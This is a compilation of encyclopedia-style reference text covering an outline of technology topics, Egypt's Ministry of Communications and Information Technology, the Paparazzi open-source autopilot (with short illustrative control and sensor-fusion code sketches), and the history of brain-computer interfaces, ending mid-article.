The Day the Universe Changed – documentary television series written and presented by science historian James Burke, originally broadcast in 1985 by the BBC. The series' primary focus is on the effect of advances in science and technology on western society in its philosophical aspects. Ran for one season, in 1986.
History of technology by region
History of science and technology in the Mediterranean
Ancient Greek technology –
Ancient Roman technology –
Timeline of Polish science and technology –
History of science and technology in Africa –
History of science and technology in Asia
History of science and technology in China –
Science and technology of the Han dynasty –
Science and technology of the Tang dynasty –
Science and technology of the Song dynasty –
History of science and technology in the People's Republic of China –
History of science and technology in the Indian subcontinent –
Science and technology in ancient India –
History of science and technology in Korea –
Science and Technology in the Ottoman Empire –
Science and technology in the Soviet Union –
History of science and technology in North America
United States technological and industrial history –
History of science and technology in Mexico –
Technological and industrial history of Canada –
Technological and industrial history of 20th-century Canada –
Technological and industrial history of 21st-century Canada –
Technological and industrial history of the People's Republic of China –
Technological and industrial history of the United States –
History of technology by field
History of invention
History of aerospace
History of artificial intelligence
History of agriculture
History of agricultural science
History of architecture, timeline
History of biotechnology
History of cartography
History of chemical engineering
History of communication
History of computing, timeline
History of computer science
History of computing hardware
History of the graphical user interface
History of hypertext, timeline
History of the Internet, Internet phenomena
History of the World Wide Web
History of operating systems
History of programming languages, timeline
History of software engineering
History of electrical engineering
History of energy development
History of engineering
History of industry
History of library and information science
History of microscopy
History of manufacturing
History of the factory
History of mass production
History of materials science, timeline
History of measurement
History of medicine
History of motor and engine technology
History of military science
History of transport, timeline
History of biotechnology –
Timeline of biotechnology –
History of display technology –
History of film technology –
History of information technology auditing –
History of military technology –
History of nanotechnology –
History of science and technology –
History of web syndication technology –
Timeline of agriculture and food technology –
Timeline of clothing and textiles technology –
Timeline of communication technology –
Timeline of diving technology –
Timeline of heat engine technology –
Timeline of hypertext technology –
Timeline of lighting technology –
Timeline of low-temperature technology –
Timeline of materials technology –
Timeline of medicine and medical technology –
Timeline of microscope technology –
Timeline of motor and engine technology –
Timeline of particle physics technology –
Timeline of photography technology –
Timeline of rocket and missile technology –
Timeline of telescope technology –
Timeline of telescopes, observatories, and observing technology –
Timeline of temperature and pressure measurement technology –
Timeline of time measurement technology –
Timeline of transportation technology –
Hypothetical technology
Potential technology of the future includes:
Hypothetical technology –
Femtotechnology – hypothetical term used in reference to structuring of matter on the scale of a femtometer, which is 10−15 m. This is a smaller scale in comparison to nanotechnology and picotechnology which refer to 10−9 m and 10−12 m respectively. Work in the femtometer range involves manipulation of excited energy states within atomic nuclei (see nuclear isomer) to produce metastable (or otherwise stabilized) states with unusual properties.
Philosophy of technology
Management of technology
Advancement of technology
Politics of technology
Politics and technology
AI takeover
Accelerating change
Format war
Information privacy
IT law
PEST analysis
Robot rights
Technological singularity
Technological sovereignty
Economics of technology
Energy accounting
Nanosocialism
Post-scarcity economy
Technocracy
Technocapitalism
Technological diffusion
Technology acceptance model
Technology lifecycle
Technology transfer
Technology education
Technology education
Technology museums
Technology organizations
Science and technology think tanks
Applied Biomathematics
Battelle Memorial Institute
Cicada 3301
Council for Scientific and Industrial Research
Edge Foundation, Inc.
Eudoxa
Federation of American Scientists
Free Software Foundation
GTRI Office of Policy Analysis and Research
Information Technology and Innovation Foundation
Institute for Science and International Security
Institute for the Encouragement of Scientific Research and Innovation of Brussels
Keck Institute for Space Studies
Kestrel Institute
Malaysian Industry-Government Group for High Technology
Moore Center for Theoretical Cosmology and Physics
Pakistan Council of Scientific and Industrial Research
Piratbyrån
RAND Corporation
Regional Center for Renewable Energy and Energy Efficiency
Res4Med
Richard Dawkins Foundation for Reason and Science
Swecha
Wau Holland Foundation
Technology media
For historical treatments, see Media about the history of technology, above.
Technology journalism –
Books on technology
Engines of Creation –
Technology periodicals
Engadget –
TechCrunch –
Wired –
Websites
The Verge
Fictional technology
Fictional technology –
In Death technology –
Technology in Star Trek –
Technology in Star Wars –
Technology in science fiction –
Technology of Robotech –
List of technology in the Dune universe –
Persons influential in technology
List of engineers
List of inventors
List of scientists
See also
Outline of applied science
Further reading
Huesemann, M.H., and J.A. Huesemann (2011). Technofix: Why Technology Won't Save Us or the Environment. New Society Publishers.
Kevin Kelly. What Technology Wants. New York, Viking Press, 14 October 2010, hardcover, 416 pages.
Mumford, Lewis. (2010). Technics and Civilization. University of Chicago Press.
Rhodes, Richard. (2000). Visions of Technology: A Century of Vital Debate about Machines, Systems, and the Human World. Simon & Schuster.
Teich, A.H. (2008). Technology and the Future. Wadsworth Publishing, 11th edition.
Wright, R.T. (2008). Technology. Goodheart-Wilcox Company, 5th edition.
References
External links
Technology news
BBC on technology
Bloomberg on technology
MIT Technology Review
New York Times technology section
Wired
Miscellaneous topics
Note: these topics need to be placed in the outline above. Some may be irrelevant and those should be removed. New sections may be needed in the outline to provide a suitable place for some of these items. Annotations by way of short descriptions may help decide where a link should go.
application of modern information technology in activities related to dance: in dance education, choreography, performance, and research.
Technofile
Technology
Ministry of Communications and Information Technology (Egypt)
The Egyptian Ministry of Communications and Information Technology (MCIT) is the government body responsible for information and communications technology (ICT) issues in the Arab Republic of Egypt. Established in 1999, MCIT is responsible for the planning, implementation and operation of government ICT plans and strategies.
MCIT is led by the Minister of Communications and Information Technology, who is nominated by the Prime Minister and is a member of the cabinet. The current ICT Minister is Amr Talaat who assumed the position on 14 June 2018.
MCIT is headquartered in Smart Village Egypt, in 6th of October, Giza Governorate, in the Cairo metropolitan area.
Background
In September 1999, former President Hosni Mubarak announced the inauguration of a national program to develop the information and communication technology sector in Egypt. The goals of the program were to foster the development of an information society in Egypt and stimulate the growth of a strong, competitive, vibrant, export-oriented ICT sector. The cornerstone of this program was the establishment of the Ministry of Communications and Information Technology in October 1999 to lead these efforts.
MCIT, then headed by Ahmed Nazif, soon launched a national plan for communications and information technology, establishing projects and initiatives, including the Egyptian Information Society Initiative (EISI), geared to support and empower public-private partnerships to develop and expand telecommunications infrastructure; provide ICT access to all citizens; develop meaningful Arabic content; establish a large pool of trained ICT professionals to create and innovate; build a policy framework and support infrastructure to foster the growth of a powerful and competitive ICT industry; and leverage ICT to empower development in health, education, government, commerce, culture and other areas.
Vision and mission
Egypt's Ministry of Communications and Information Technology was established to facilitate the country's assimilation into the global information society. Its mandate is to support the development of the local ICT industry, thereby boosting exports and creating jobs, promoting the use of ICT nationwide as a means to achieve national development goals, and building the foundations of a knowledge society in Egypt—in close collaboration with other governmental, civil society and private sector entities.[3]
Since its establishment, MCIT—in partnership with other government bodies, non-governmental organizations and the private sector—has worked to develop the foundational infrastructure and framework for an information society in Egypt. Following the conclusion of the Egyptian Information Society Initiative in 2006, MCIT initiated the 2007–2010 strategy with the objective of further restructuring the sector, developing a knowledge society and supporting the ICT industry with a focus on expanding exports of ICT products and services. According to the 2010 ICT Strategy, the ministry's main priorities are to:
Continue development of a state-of-the-art ICT infrastructure that provides an enabling environment for government and businesses throughout Egypt and links it globally
Create a vibrant and export-oriented ICT industry
Leverage public-private partnerships as an implementation mechanism whenever possible
Enable society to absorb and benefit from expanding sources of information
Create a learning community whose members have access to all the resources and information they require regardless of gender and location, thereby allowing all to achieve their full potential and play a part in the country's socioeconomic development
Support skills development required by the ICT industry
Support research and innovation in ICT
MCIT's new 2014–2018 strategy primarily addresses the political and economic changes taking place in Egypt, the development of the communications sector both regionally and internationally, and Egypt's national development priorities.
Ministers
A relatively new entity, MCIT was established in October 1999. Ahmed Nazif served as the first minister from 1999 to 2004. His successor, Tarek Kamel, served as minister from July 2004 to February 2011. Magued Osman was appointed ICT minister in the caretaker government from February to July 2011. Mohamed Salem then held the position until 2 August 2012, when he was replaced by Hany Mahmoud. In January 2013, Atef Helmy assumed the position, and in March 2015, Khaled Negm was appointed ICT minister. Yasser ElKady was appointed on 19 September 2015. The current ICT minister is Amr Talaat, who assumed the position on 14 June 2018.
Initiatives
MCIT initiatives and objectives include the following:
ICT sector restructuring, including legislative reform, to create a market more appealing to local and foreign investment
Free Internet: a service launched in January 2002 by Telecom Egypt, in partnership with the majority of the country's Internet service providers, eliminating monthly subscription fees for dial-up Internet access, with users required only to pay the price of the local phone call to connect to the network
Broadband Initiative: launched in May 2004 to increase the availability of high-speed broadband connections at reduced flat rates and to promote public awareness of the advantages of broadband Internet access over dial-up access
Fixed and Mobile Licensing Program: this resulted in a national roaming agreement signed by the three mobile operators (Orange Egypt, Vodafone Egypt and Etisalat Egypt) and the National Telecommunications Regulatory Authority (NTRA) in June 2007 to provide users with expanded 3G services
Launch of the country code top-level domain “.misr”
Postal sector reform program: launched in 2002 to modernize Egypt Post by improving services, expanding capabilities and developing new revenue streams
Enhancing the framework governing the use of ICT networks and services
ICT for Development: a group of projects designed to leverage the potential of ICT to help Egypt achieve its human development goals and improve the lives of citizens using public-private partnerships to facilitate the planning, implementation, analysis and dissemination of projects throughout all sectors of the economy, including health, education, culture and government services
Promoting innovation and ICT industry development, including research and development, training, investment and e-business
Establishing technology parks, including Smart Village and Maadi Contact Centers Park
Developing mutually beneficial partnerships with governments and agencies, civil society organizations and multilateral organizations around the world to share expertise and explore and develop opportunities
Developing a digital economy with the World Bank
Affiliate Organizations
National Telecommunications Regulatory Authority
The National Telecommunications Regulatory Authority of Egypt (NTRA) was founded in 2003 according to the Telecommunications Regulation Law as a national authority to administer the telecommunication sector. The scope of NTRA work covers issues related to transparency, open competition, universal service and protection of user rights. NTRA acts as an independent arbiter for ICT sector stakeholders.
Information Technology Industry Development Agency
The Information Technology Industry Development Agency (ITIDA) was founded in 2004 as the executive IT arm of the Ministry of Communications and Information Technology. Located in Smart Village, ITIDA is a government entity mandated to boost the development of the Egyptian IT sector and increase its global competitiveness. The agency is tasked with developing the IT industry by identifying the needs of local industry and addressing them with tailored programs. Its responsibilities also include enhancing the Egyptian cybersecurity and data protection framework to facilitate e-business and business process outsourcing (BPO) activities.
Through its Intellectual Property Rights (IPR) Office, ITIDA aims at ensuring effective enforcement of the Copyright Law, fighting piracy and sanctioning infringements in order to guarantee effective protection for computer programs and databases. The IPR Office works to raise awareness and understanding of intellectual property rights in the software community and for the public at large, and cooperates with different bodies concerned with IPR on both the national and international levels. The office also functions as a depository for computer programs and databases, provides licenses for reproducing and translating computer programs and databases for educational purposes, and issues mandatory permission to practice for software enterprises.
Egypt Post
Founded in 1865, the Egyptian National Post Organization (ENPO) is the largest provider of postal services in Egypt, providing services including the delivery of correspondence, documents, money and goods.
Information Technology Institute
The Information Technology Institute (ITI) was founded in 1992 by the Government of Egypt's Information and Decision Support Center (IDSC) to assist in paving the way for the evolution of a knowledge-based society by developing a new generation of professionals. Prime Minister Dr Ahmed Nazif shifted the affiliation of ITI to the Ministry of Communications and Information Technology in April 2005. Every year, ITI accepts a limited number of graduates of any discipline for its training program, which offers 14 specializations.
National Telecommunication Institute
The National Telecommunication Institute (NTI), affiliated to the Ministry of Communications and Information Technology, was founded in 1984 as a scientific institute with university status. The institute specializes in training, education and research activities in the field of telecommunications.
The Center for Documentation of Cultural and Natural Heritage
The Center for Documentation of Cultural and Natural Heritage (CULTNAT) was established in January 2000 as a project operating under the auspices of the Ministry of Communications and Information Technology. In 2003, CULTNAT turned into an affiliate of MCIT and Bibliotheca Alexandrina. The center runs an array of projects and programs for the documentation of both the tangible and intangible aspects of Egypt's cultural and natural heritage, including archaeology, architecture, manuscripts, music, folklore, caricatures, plastic arts and natural resources.
The Technology Innovation and Entrepreneurship Center
The Technology Innovation and Entrepreneurship Center (TIEC) aims to drive innovation and entrepreneurship in the ICT field for the benefit of national economy. The center was launched at Smart Village in September 2010.
Related Institutions
Smart Village Egypt
Egypt's Smart Village is a business park covering three million square meters, offering high-tech facilities and infrastructure for IT and telecom companies.
Technology Development Fund
The Technology Development Fund is a venture capital fund established by the Ministry of Communications and Information Technology in 2004 as a public-private partnership to finance and support Egyptian startups in the ICT sector.
See also
Cabinet of Egypt
References
External links
Ministry of Communications and Information Technology official site
National Telecommunications Regulatory Authority (NTRA)
Information Technology Industry Development Agency (ITIDA)
Information Technology Institute (ITI)
Smart Village Cairo, business and technology park
Egypt's Cabinet Database
1999 establishments in Egypt
Communications in Egypt
Egypt
Information ministries
Communications and Information Technology (Egypt)
Communications and Information Technology
Paparazzi Project
Paparazzi is an open-source autopilot system oriented toward inexpensive autonomous aircraft.
Low cost and availability enable hobbyist use in small remotely piloted aircraft. The project began in 2003, and is being further developed and used at École nationale de l'aviation civile (ENAC), a French civil aeronautics academy. Several vendors are currently producing Paparazzi autopilots and accessories.
Overview
An autopilot allows a remotely piloted aircraft to be flown out of sight. All hardware and software are open-source and freely available to anyone under GNU licensing. Open-source autopilots provide flexible hardware and software.
Users can easily modify the autopilot based on their own special requirements, such as forest fire evaluation.
Paparazzi collaborators share ideas and information using the same MediaWiki software that is used by Wikipedia.
Paparazzi accepts commands and sensor data, and adjusts flight controls accordingly. For example, a command might be to climb at a certain rate, and Paparazzi will adjust power and/or control surfaces. As of 2010, Paparazzi did not have a reliable airspeed hold or airspeed change function, because no airspeed sensor reading was considered by the controller.
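As an illustration of this kind of command-to-actuator loop, the minimal sketch below turns a commanded climb rate into a throttle adjustment with a simple proportional-integral controller. It is not Paparazzi's actual code; the gains, names, and fixed time step are hypothetical example values.

```python
# Minimal sketch of a climb-rate control loop, illustrating the idea described
# above. This is NOT Paparazzi's actual implementation; the gains, names, and
# fixed time step are hypothetical example values.

class ClimbRateController:
    def __init__(self, kp=0.08, ki=0.02, dt=0.05):
        self.kp = kp            # proportional gain (hypothetical)
        self.ki = ki            # integral gain (hypothetical)
        self.dt = dt            # control period in seconds
        self.integral = 0.0

    def update(self, commanded_climb_rate, measured_climb_rate):
        """Return a throttle increment computed from the climb-rate error."""
        error = commanded_climb_rate - measured_climb_rate
        self.integral += error * self.dt
        return self.kp * error + self.ki * self.integral


if __name__ == "__main__":
    ctrl = ClimbRateController()
    # Command a 2 m/s climb while the vehicle currently climbs at 0.5 m/s.
    delta_throttle = ctrl.update(commanded_climb_rate=2.0, measured_climb_rate=0.5)
    print(f"throttle adjustment: {delta_throttle:+.3f}")
```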
Delft University of Technology released its Lisa/S chip project in 2013 which is based on Paparazzi.
Mechanisms
Hardware
Paparazzi supports multiple hardware designs, including STM32 and LPC2100 series microcontrollers. A number of CAD files have been released.
Paparazzi provides a minimum set of flight sensors (an illustrative fusion sketch follows the list):
Attitude (orientation about center of mass) estimation is done with a set of infrared thermopiles.
Position and altitude are obtained from a standard GPS receiver.
Roll rate measurement may be input from an optional gyroscope.
Acceleration from optional inertial sensors.
Direction from optional magnetic sensors.
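As a rough illustration of how readings like these can be combined, the sketch below blends an integrated gyroscope rate with an infrared-derived roll estimate using a complementary filter. This is a hypothetical example, not Paparazzi's actual estimator; the thermopile scaling and the 0.98/0.02 blend are arbitrary values chosen for demonstration.

```python
import math

# Illustrative complementary-filter fusion of a gyro roll rate with a roll
# angle derived from opposing infrared thermopile readings. Hypothetical
# sketch only; constants are arbitrary example values.

def roll_from_thermopiles(ir_left, ir_right, ir_contrast):
    """Crude roll estimate (radians) from the left/right thermopile difference."""
    return math.atan2(ir_left - ir_right, ir_contrast)

def fuse_roll(prev_roll, gyro_roll_rate, ir_left, ir_right, ir_contrast, dt=0.02):
    """Blend gyro integration (short-term) with the IR estimate (long-term)."""
    gyro_roll = prev_roll + gyro_roll_rate * dt
    ir_roll = roll_from_thermopiles(ir_left, ir_right, ir_contrast)
    return 0.98 * gyro_roll + 0.02 * ir_roll

if __name__ == "__main__":
    roll = 0.0
    for _ in range(50):  # simulate a steady 0.1 rad/s roll rate with a mild IR offset
        roll = fuse_roll(roll, gyro_roll_rate=0.1, ir_left=120, ir_right=100, ir_contrast=400)
    print(f"fused roll estimate: {roll:.3f} rad")
```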
Software
The open-source software suite contains everything needed to let an airborne system fly reliably.
See also
Crowdsourcing
Micro air vehicle
ArduCopter open source autopilot software
OpenPilot open source autopilot software
Open-source robotics
PX4 autopilot
Slugs (autopilot system)
Ardupilot
References
External links
Paparazzi Project
24th Chaos Communication Congress 2007-12-27 11:45 Martin Müller, Antoine Drouin
Build your own UAV
Paparazzi User Manual
OSAM (Open Source Autonomous Multiple-Unmanned Aerial Vehicle) at Utah State University
(Open Source Drone Projects)
Avionics
Aircraft instruments
Unmanned aerial vehicles
Free software
Open-source hardware
Brain–computer interface
A brain–computer interface (BCI), sometimes called a brain–machine interface (BMI), is a direct communication pathway between the brain's electrical activity and an external device, most commonly a computer or robotic limb. BCIs are often directed at researching, mapping, assisting, augmenting, or repairing human cognitive or sensory-motor functions. Implementations of BCIs range from non-invasive (EEG, MEG, EOG, MRI) and partially invasive (ECoG and endovascular) to invasive (microelectrode array), based on how close electrodes get to brain tissue.
Research on BCIs began in the 1970s by Jacques Vidal at the University of California, Los Angeles (UCLA) under a grant from the National Science Foundation, followed by a contract from DARPA. Vidal's 1973 paper marks the first appearance of the expression brain–computer interface in scientific literature.
Due to the cortical plasticity of the brain, signals from implanted prostheses can, after adaptation, be handled by the brain like natural sensor or effector channels. Following years of animal experimentation, the first neuroprosthetic devices implanted in humans appeared in the mid-1990s.
Recently, studies in human-computer interaction applying machine learning to statistical temporal features extracted from frontal lobe EEG data have had high levels of success in classifying mental states (relaxed, neutral, concentrating), mental emotional states (negative, neutral, positive) and thalamocortical dysrhythmia.
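A hedged sketch of that general approach is shown below: statistical temporal features are computed from short EEG windows and fed to an off-the-shelf classifier. The window length, feature set, synthetic data, and choice of classifier are illustrative assumptions, not the exact pipeline of the cited studies.

```python
import numpy as np
from scipy.stats import skew, kurtosis
from sklearn.ensemble import RandomForestClassifier

# Illustrative sketch: classify mental states from statistical temporal
# features of single-channel EEG windows. All choices here are assumptions
# for demonstration, not the published pipeline.

def window_features(eeg_window):
    """Simple statistical temporal features for one EEG window."""
    return np.array([
        eeg_window.mean(),
        eeg_window.std(),
        skew(eeg_window),
        kurtosis(eeg_window),
        np.max(eeg_window) - np.min(eeg_window),   # peak-to-peak amplitude
    ])

rng = np.random.default_rng(0)
# Fake training data: 200 one-second windows at 128 Hz, with 3 state labels.
windows = rng.normal(size=(200, 128))
labels = rng.integers(0, 3, size=200)              # 0=relaxed, 1=neutral, 2=concentrating

X = np.vstack([window_features(w) for w in windows])
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, labels)
print("predicted state:", clf.predict(window_features(windows[0]).reshape(1, -1)))
```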
History
The history of brain–computer interfaces (BCIs) starts with Hans Berger's discovery of the electrical activity of the human brain and the development of electroencephalography (EEG). In 1924 Berger was the first to record human brain activity by means of EEG. Berger was able to identify oscillatory activity, such as Berger's wave or the alpha wave (8–13 Hz), by analyzing EEG traces.
Berger's first recording device was very rudimentary. He inserted silver wires under the scalps of his patients. These were later replaced by silver foils attached to the patient's head by rubber bandages. Berger connected these sensors to a Lippmann capillary electrometer, with disappointing results. However, more sophisticated measuring devices, such as the Siemens double-coil recording galvanometer, which displayed electric voltages as small as one ten thousandth of a volt, led to success.
Berger analyzed the interrelation of alternations in his EEG wave diagrams with brain diseases. EEGs permitted completely new possibilities for the research of human brain activities.
Although the term had not yet been coined, one of the earliest examples of a working brain-machine interface was the piece Music for Solo Performer (1965) by the American composer Alvin Lucier. The piece makes use of EEG and analog signal processing hardware (filters, amplifiers, and a mixing board) to stimulate acoustic percussion instruments. To perform the piece one must produce alpha waves and thereby "play" the various percussion instruments via loudspeakers which are placed near or directly on the instruments themselves.
UCLA Professor Jacques Vidal coined the term "BCI" and produced the first peer-reviewed publications on this topic. Vidal is widely recognized as the inventor of BCIs in the BCI community, as reflected in numerous peer-reviewed articles reviewing and discussing the field. A review pointed out that Vidal's 1973 paper stated the "BCI challenge" of controlling external objects using EEG signals, and especially the use of the Contingent Negative Variation (CNV) potential as a challenge for BCI control. The 1977 experiment Vidal described was the first application of BCI after his 1973 BCI challenge. It was a noninvasive EEG (actually Visual Evoked Potentials (VEP)) control of a cursor-like graphical object on a computer screen. The demonstration was movement in a maze.
After his early contributions, Vidal was not active in BCI research, nor BCI events such as conferences, for many years. In 2011, however, he gave a lecture in Graz, Austria, supported by the Future BNCI project, presenting the first BCI, which earned a standing ovation. Vidal was joined by his wife, Laryce Vidal, who previously worked with him at UCLA on his first BCI project.
In 1988, a report was given on noninvasive EEG control of a physical object, a robot. The experiment described was EEG control of multiple start-stop-restart of the robot movement, along an arbitrary trajectory defined by a line drawn on a floor. The line-following behavior was the default robot behavior, utilizing autonomous intelligence and autonomous source of energy. This 1988 report written by Stevo Bozinovski, Mihail Sestakov, and Liljana Bozinovska was the first one about a robot control using EEG.
In 1990, a report was given on a closed loop, bidirectional adaptive BCI controlling computer buzzer by an anticipatory brain potential, the Contingent Negative Variation (CNV) potential. The experiment described how an expectation state of the brain, manifested by CNV, controls in a feedback loop the S2 buzzer in the S1-S2-CNV paradigm. The obtained cognitive wave representing the expectation learning in the brain is named Electroexpectogram (EXG). The CNV brain potential was part of the BCI challenge presented by Vidal in his 1973 paper.
Studies in 2010s suggested the potential ability of neural stimulation to restore functional connectively and associated behaviors through modulation of molecular mechanisms of synaptic efficacy. This opened the door for the concept that BCI technologies may be able to restore function in addition to enabling functionality.
Since 2013, DARPA has funded BCI technology through the BRAIN initiative, which has supported work out of the University of Pittsburgh Medical Center, Paradromics, Brown, and Synchron, among others.
BCIs versus neuroprosthetics
Neuroprosthetics is an area of neuroscience concerned with neural prostheses, that is, using artificial devices to replace the function of impaired nervous systems and brain-related problems, or of sensory organs or other organs (bladder, diaphragm, etc.). As of December 2010, cochlear implants had been implanted as neuroprosthetic devices in approximately 220,000 people worldwide. There are also several neuroprosthetic devices that aim to restore vision, including retinal implants. The first neuroprosthetic device, however, was the pacemaker.
The terms are sometimes used interchangeably. Neuroprosthetics and BCIs seek to achieve the same aims, such as restoring sight, hearing, movement, ability to communicate, and even cognitive function. Both use similar experimental methods and surgical techniques.
Animal BCI research
Several laboratories have managed to record signals from monkey and rat cerebral cortices to operate BCIs to produce movement. Monkeys have navigated computer cursors on screen and commanded robotic arms to perform simple tasks simply by thinking about the task and seeing the visual feedback, but without any motor output. In May 2008 photographs that showed a monkey at the University of Pittsburgh Medical Center operating a robotic arm by thinking were published in a number of well-known science journals and magazines. Sheep too have been used to evaluate BCI technology including Synchron's Stentrode.
In 2020, Elon Musk's Neuralink was successfully implanted in a pig, announced in a widely viewed webcast. In 2021 Elon Musk announced that he had successfully enabled a monkey to play video games using Neuralink's device.
Early work
In 1969 the operant conditioning studies of Fetz and colleagues,
at the Regional Primate Research Center and Department of Physiology and Biophysics, University of Washington School of Medicine in Seattle, showed for the first time that monkeys could learn to control the deflection of a biofeedback meter arm with neural activity. Similar work in the 1970s established that monkeys could quickly learn to voluntarily control the firing rates of individual and multiple neurons in the primary motor cortex if they were rewarded for generating appropriate patterns of neural activity.
Studies that developed algorithms to reconstruct movements from motor cortex neurons, which control movement, date back to the 1970s. In the 1980s, Apostolos Georgopoulos at Johns Hopkins University found a mathematical relationship between the electrical responses of single motor cortex neurons in rhesus macaque monkeys and the direction in which they moved their arms (based on a cosine function). He also found that dispersed groups of neurons, in different areas of the monkey's brains, collectively controlled motor commands, but was able to record the firings of neurons in only one area at a time, because of the technical limitations imposed by his equipment.
There has been rapid development in BCIs since the mid-1990s. Several groups have been able to capture complex brain motor cortex signals by recording from neural ensembles (groups of neurons) and using these to control external devices.
Prominent research successes
Kennedy and Yang Dan
Phillip Kennedy (who later founded Neural Signals in 1987) and colleagues built the first intracortical brain–computer interface by implanting neurotrophic-cone electrodes into monkeys.
In 1999, researchers led by Yang Dan at the University of California, Berkeley decoded neuronal firings to reproduce images seen by cats. The team used an array of electrodes embedded in the thalamus (which integrates all of the brain's sensory input) of sharp-eyed cats. Researchers targeted 177 brain cells in the thalamus lateral geniculate nucleus area, which decodes signals from the retina. The cats were shown eight short movies, and their neuron firings were recorded. Using mathematical filters, the researchers decoded the signals to generate movies of what the cats saw and were able to reconstruct recognizable scenes and moving objects. Similar results in humans have since been achieved by researchers in Japan (see below).
Nicolelis
Miguel Nicolelis, a professor at Duke University, in Durham, North Carolina, has been a prominent proponent of using multiple electrodes spread over a greater area of the brain to obtain neuronal signals to drive a BCI.
After conducting initial studies in rats during the 1990s, Nicolelis and his colleagues developed BCIs that decoded brain activity in owl monkeys and used the devices to reproduce monkey movements in robotic arms. Monkeys have advanced reaching and grasping abilities and good hand manipulation skills, making them ideal test subjects for this kind of work.
By 2000, the group succeeded in building a BCI that reproduced owl monkey movements while the monkey operated a joystick or reached for food. The BCI operated in real time and could also control a separate robot remotely over Internet protocol. But the monkeys could not see the arm moving and did not receive any feedback, a so-called open-loop BCI.
Later experiments by Nicolelis using rhesus monkeys succeeded in closing the feedback loop and reproduced monkey reaching and grasping movements in a robot arm. With their deeply cleft and furrowed brains, rhesus monkeys are considered to be better models for human neurophysiology than owl monkeys. The monkeys were trained to reach and grasp objects on a computer screen by manipulating a joystick while corresponding movements by a robot arm were hidden. The monkeys were later shown the robot directly and learned to control it by viewing its movements. The BCI used velocity predictions to control reaching movements and simultaneously predicted handgripping force. In 2011, O'Doherty and colleagues demonstrated a BCI with sensory feedback in rhesus monkeys. The monkey controlled the position of an avatar arm with its brain activity while receiving sensory feedback through direct intracortical microstimulation (ICMS) in the arm representation area of the sensory cortex.
Donoghue, Schwartz and Andersen
Other laboratories which have developed BCIs and algorithms that decode neuron signals include the Carney Institute for Brain Science at Brown University and the labs of Andrew Schwartz at the University of Pittsburgh and Richard Andersen at Caltech. These researchers have been able to produce working BCIs, even using recorded signals from far fewer neurons than did Nicolelis (15–30 neurons versus 50–200 neurons).
John Donoghue's lab at the Carney Institute reported training rhesus monkeys to use a BCI to track visual targets on a computer screen (closed-loop BCI) with or without assistance of a joystick. Schwartz's group created a BCI for three-dimensional tracking in virtual reality and also reproduced BCI control in a robotic arm. The same group also created headlines when they demonstrated that a monkey could feed itself pieces of fruit and marshmallows using a robotic arm controlled by the animal's own brain signals.
Andersen's group used recordings of premovement activity from the posterior parietal cortex in their BCI, including signals created when experimental animals anticipated receiving a reward.
Other research
In addition to predicting kinematic and kinetic parameters of limb movements, BCIs that predict electromyographic or electrical activity of the muscles of primates are being developed. Such BCIs could be used to restore mobility in paralyzed limbs by electrically stimulating muscles.
Miguel Nicolelis and colleagues demonstrated that the activity of large neural ensembles can predict arm position. This work made possible creation of BCIs that read arm movement intentions and translate them into movements of artificial actuators. Carmena and colleagues programmed the neural coding in a BCI that allowed a monkey to control reaching and grasping movements by a robotic arm. Lebedev and colleagues argued that brain networks reorganize to create a new representation of the robotic appendage in addition to the representation of the animal's own limbs.
In 2019, researchers from UCSF published a study where they demonstrated a BCI that had the potential to help patients with speech impairment caused by neurological disorders. Their BCI used high-density electrocorticography to tap neural activity from a patient's brain and used deep learning methods to synthesize speech. In 2021, researchers from the same group published a study showing the potential of a BCI to decode words and sentences in an anarthric patient who had been unable to speak for over 15 years.
The biggest impediment to BCI technology at present is the lack of a sensor modality that provides safe, accurate and robust access to brain signals. It is conceivable or even likely, however, that such a sensor will be developed within the next twenty years. The use of such a sensor should greatly expand the range of communication functions that can be provided using a BCI.
Development and implementation of a BCI system is complex and time-consuming. In response to this problem, Gerwin Schalk has been developing a general-purpose system for BCI research, called BCI2000. BCI2000 has been in development since 2000 in a project led by the Brain–Computer Interface R&D Program at the Wadsworth Center of the New York State Department of Health in Albany, New York, United States.
A new 'wireless' approach uses light-gated ion channels such as Channelrhodopsin to control the activity of genetically defined subsets of neurons in vivo. In the context of a simple learning task, illumination of transfected cells in the somatosensory cortex influenced the decision-making process of freely moving mice.
The use of BMIs has also led to a deeper understanding of neural networks and the central nervous system. Research has shown that despite the inclination of neuroscientists to believe that neurons have the most effect when working together, single neurons can be conditioned through the use of BMIs to fire at a pattern that allows primates to control motor outputs. The use of BMIs has led to development of the single neuron insufficiency principle, which states that, even with a well-tuned firing rate, single neurons can carry only a narrow amount of information, and therefore the highest level of accuracy is achieved by recording the firings of the collective ensemble. Other principles discovered with the use of BMIs include the neuronal multitasking principle, the neuronal mass principle, the neural degeneracy principle, and the plasticity principle.
BCIs are also proposed to be applied by users without disabilities. A user-centered categorization of BCI approaches by Thorsten O. Zander and Christian Kothe introduces the term passive BCI. Next to active and reactive BCI that are used for directed control, passive BCIs allow for assessing and interpreting changes in the user state during Human-Computer Interaction (HCI). In a secondary, implicit control loop the computer system adapts to its user improving its usability in general.
Beyond BCI systems that decode neural activity to drive external effectors, BCI systems may be used to encode signals from the periphery. These sensory BCI devices enable real-time, behaviorally-relevant decisions based upon closed-loop neural stimulation.
The BCI Award
The Annual BCI Research Award is awarded in recognition of outstanding and innovative research in the field of Brain-Computer Interfaces. Each year, a renowned research laboratory is asked to judge the submitted projects. The jury consists of world-leading BCI experts recruited by the awarding laboratory. The jury selects twelve nominees, then chooses a first, second, and third-place winner, who receive awards of $3,000, $2,000, and $1,000, respectively.
Human BCI research
Invasive BCIs
Invasive BCI requires surgery to implant electrodes under the scalp for communicating brain signals. The main advantage is a more accurate reading; however, the downsides include side effects from the surgery. After the surgery, scar tissue may form, which can make brain signals weaker. In addition, according to the research of Abdulkader et al. (2015), the body may not accept the implanted electrodes, and this can cause a medical condition.
Vision
Invasive BCI research has targeted repairing damaged sight and providing new functionality for people with paralysis. Invasive BCIs are implanted directly into the grey matter of the brain during neurosurgery. Because they lie in the grey matter, invasive devices produce the highest quality signals of BCI devices but are prone to scar-tissue build-up, causing the signal to become weaker, or even non-existent, as the body reacts to a foreign object in the brain.
In vision science, direct brain implants have been used to treat non-congenital (acquired) blindness. One of the first scientists to produce a working brain interface to restore sight was private researcher William Dobelle.
